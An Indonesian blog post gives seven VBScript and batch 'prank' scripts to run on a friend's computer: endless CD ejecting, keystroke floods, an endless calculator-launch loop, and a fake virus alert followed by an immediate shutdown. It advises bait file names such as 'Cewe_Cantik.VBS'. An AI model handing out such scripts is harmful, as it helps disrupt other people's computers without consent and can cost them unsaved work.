Jumat, 15 Juli 2011

Script Notepad Untuk Jahilin Temen

Selamat malam sobat blogger mau update lagi nih...kali saya memberikan tips untuk mengerjai teman anda..hehehe..Untuk mengerjainya kita hanya butuh notepad dan script kodenya saja. Silahkan lihat scriptnya di bawah ini : 


1. Meng-eject Drive CD-Room Terus-Menerus
Code:

Code:
Set oWMP = CreateObject(“WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
^
^
^
hati2 gan, klo keseringan bisa wafat tu kompie ..

2. Tombol Enter Terus-terusan Aktif 
Code:

Code:
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop
3. Iseng Dengan Pesan Lambat Notepad “Hello, how are you? I am good thanks!
Code:

Code:
WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject(“WScript.Shell”)
WshShell.Run “notepad”
WScript.Sleep 100
WshShell.AppActivate “Notepad”
WScript.Sleep 500
WshShell.SendKeys “Hel”
WScript.Sleep 500
WshShell.SendKeys “lo ”
WScript.Sleep 500
WshShell.SendKeys “, ho”
WScript.Sleep 500
WshShell.SendKeys “w a”
WScript.Sleep 500
WshShell.SendKeys “re ”
WScript.Sleep 500
WshShell.SendKeys “you”
WScript.Sleep 500
WshShell.SendKeys “? ”
WScript.Sleep 500
WshShell.SendKeys “I a”
WScript.Sleep 500
WshShell.SendKeys “m g”
WScript.Sleep 500
WshShell.SendKeys “ood”
WScript.Sleep 500
WshShell.SendKeys ” th”
WScript.Sleep 500
WshShell.SendKeys “ank”
WScript.Sleep 500
WshShell.SendKeys “s! “
4. Iseng Dengan Backspace (Jika menekan tombol Bacspace akan keluar tulisan "Maaf anda harus mengulang kembali" atau bisa dibuat semau kita.)

Code:

Code:
MsgBox “Maaf, Anda Harus Mengulang Kembali”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
5. Iseng Dengan Membuka Calculator Terus Menerus
Code:

Code:
@ECHO off
:top
START %SystemRoot%\system32\cacl.exe
GOTO top
6. Iseng dengan Keyboard (tampil tulisan yang kita inginkan)
Code:

Code:
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “Maaf, Keyboard Tidak Berfungsi! Harap Diperbaiki”
loop
7. Iseng Dengan Shutdown Komputer
Code:

Code:
@echo off
msg * Komputer Anda Terinfeksi Virus
shutdown -c “Error! Virus Menyebar Keseluruh System!” -s -t 0
Semua trik di atas (No. 1 sampai 7 di simpan / save menggunakan .VBS (misalnya pake nama yang bikin penasaran, misalnya: Cewe_Cantik.VBS)


NB : Jgn praktekan di komputer anda sendiri.


Semoga bermanfaat.

lintasberita

Related Post :
Subcribe Via Email :

Jika Anda Menyukai Artikel Blog ini, Masukan Alamat Email Anda Pada Kolom di Bawah, Maka Anda Akan Mendapatkan Kiriman Email Setiap Kali Ada Posting Baru. Terima Kasih Atas Partisifasinya

Enter Your Email Address :

12 komentar:

Chat Seperti Facebook DI Blog mengatakan...

saya pernah mempraktekkannya dirumah, dan hasilnya DUaaarrrrr,,,, mengejutkan

Pendi Agus Bujangga mengatakan...

@Chat Seperti Facebook DI Blog
duaarr gmna gan???

Bima Cahya Nugraha mengatakan...

gan ada gk scipt buat komputer meledak ?

Pendi Agus Bujangga mengatakan...

@Bima Cahya Nugraha
ga donk gan...
klo mau ledakin, siram saja bensin dan idupin api...
hehehehehe..

AcerNoval mengatakan...

aduh sob., hampir aja saya praktekin di kompi sendiri., untung aja ada peringatan di tulisan terakhir, .haha

Pendi Agus Bujangga mengatakan...

@AcerNoval
untung aj gan...

Tongkonanku mengatakan...

Oh.. ini to, script yg pernah dipake teman ngerjain aku. Aku mau balas ah.. :D

Pendi Agus Bujangga mengatakan...

@Tongkonanku
ok gan..
semoga berhasil

Ladida mengatakan...

wah, saya pake notepad ga pernah mainan gini, hehehee
sip nih, udah ada yg coba?

Firdaus Tech mengatakan...

yANG pada usil2 tuhhh ,., hahahahahaha,., makasih brada

Pendi Agus Bujangga mengatakan...

@Ladida
udah tmen ane gan...

Pendi Agus Bujangga mengatakan...

@Firdaus Tech
sama2 brada...

Tulis Komentar Anda

BLOG INI DOFOLLOW...
Berikanlah sedikit komentar anda, maka anda juga memperoleh keuntungan, tapi jangan NYEPAM...
Jika tidak bisa berkomentar, gunakan "Pop Up Kotak Komentar" di bawah ini....

Status YM

Daftar Link Member KBw /20’